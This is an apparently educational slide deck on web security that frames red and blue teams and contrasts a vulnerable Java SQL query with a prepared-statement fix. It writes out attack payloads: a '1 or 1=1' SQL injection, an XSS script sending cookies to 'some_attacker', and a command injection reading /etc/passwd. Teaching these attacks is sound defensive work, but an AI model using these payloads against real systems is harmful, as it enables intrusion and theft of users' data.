Web security a red vs blue story
- 2. Disclaimer
- 3. Rolf Huisman
- 4. Rolf Huisman (Long ago)
- 7. So how do we prevent this ?
- 10. The candy drum of information
- 12. Impact of not taking care has changed a bit *In dutch: Algemene verordening gegevensbescherming (AVG)
- 13. Impact of not taking care has changed a bit *In dutch: Algemene verordening gegevensbescherming (AVG) ING Bank (2017) ~ 680 Million Alphabet (Google) ~ 4.4 Billion (2017) Microsoft (2017) ~ 3.6 Billion Rabobank (2017) ~ 104 Million Facebook (2017) ~ 1.6 Billion
- 15. Two parties in an arms race
- 17. Red Team: Become the attacker
- 18. Blue Team: Protector of assets
- 19. So where is the attack focus ?
- 21. Lets attack the weakest point first People ProcessProduct
- 22. People
- 23. People
- 25. People
- 26. People
- 27. People
- 28. People
- 29. People
- 30. People
- 32. People
- 33. People
- 36. People
- 38. Process
- 39. Process Target Responsible people Handovers and systems Conditions and assumptions The formal way and real way Timeline Exceptions and escalations
- 40. Process
- 41. Process
- 42. Process
- 43. Process
- 44. Process
- 45. Process
- 46. Process
- 47. Process
- 48. Process Spoofing Tampering Repudiation Information disclosure Denial of service Elevation of privilege
- 49. Process
- 51. Product
- 52. Product
- 53. Product
- 54. Product
- 58. Product String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " + request.getParameter("user_id"); try { Statement statement = connection.createStatement(); ResultSet rs = statement.executeQuery(accountBalanceQuery); while (rs.next()) { page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance")); } } catch (SQLException e) { ... }
- 59. Product String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " + request.getParameter("user_id"); try { Statement statement = connection.createStatement(); ResultSet rs = statement.executeQuery(accountBalanceQuery); while (rs.next()) { page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance")); } } catch (SQLException e) { ... }
- 60. Product 1234 String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " + request.getParameter("user_id"); try { Statement statement = connection.createStatement(); ResultSet rs = statement.executeQuery(accountBalanceQuery); while (rs.next()) { page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance")); } } catch (SQLException e) { ... }
- 61. Product 1234 String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " + 1234; try { Statement statement = connection.createStatement(); ResultSet rs = statement.executeQuery(accountBalanceQuery); while (rs.next()) { page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance")); } } catch (SQLException e) { ... }
- 62. Product 1234 SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
- 63. Product 1234 SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234 AccountNumber Balance 1234 20.000.000,00
- 64. Product 1234 SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234 1%20or%201%2f1
- 65. Product 1234 SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234 1%20or%201%2f1 SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1
- 66. Product 1%20or%201%2f1 SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1 AccountNumber Balance 1 5000,12 2 16.000,56 3 30.020.212,82 4 34.232,94 … …
- 67. Product SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1 SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
- 68. Product SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1 <H1>Hi Rolf</H1> <H1>Hi <script>window.location="http://some_attacker/cookie.cgi?steal=" +escape(document.cookie)</script> </H1> SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
- 69. Product SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1 <H1>Hi Rolf</H1> $ rm tempfile;id;cat /etc/passwd $ rm tempfile <H1>Hi <script>window.location="http://some_attacker/cookie.cgi?steal=" +escape(document.cookie)</script> </H1> SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
- 70. Product
- 71. Product
- 72. Product String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " + request.getParameter("user_id"); String userId = request.getParameter("user_id"); String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = ? ";
- 73. Product String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " + request.getParameter("user_id"); String userId = request.getParameter("user_id"); String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = ? "; Statement statement = connection.createStatement(); ResultSet rs = statement.executeQuery(accountBalanceQuery); PreparedStatement statement = connection.preparereStatement(accountBalanceQuery); statement.setString (1,userId); ResultSet rs = statement.executeQuery();
- 74. Product
- 75. Product
- 76. Product
- 77. Product
- 78. Product
- 79. Product
- 80. Product
- 81. Product
- 82. Product
- 83. Product
- 84. Product
- 85. Product
- 86. Product
- 87. Product
- 88. Product
- 90. Summary People • Make it easy to be safe • Security event monitoring • … ProcessProduct
- 91. Summary People • Make it easy to be safe • Security event monitoring • … Process • Misuse cases • Threat modeling • STRIDE • … Product
- 92. Summary People • Make it easy to be safe • Security event monitoring • … Process • Misuse cases • Threat modeling • STRIDE • … Product • Get Trained • Use the correct API’s and tools • Have things tested • …
- 93. Further Reading
- 94. So let us keep our candy safe ! Questions ?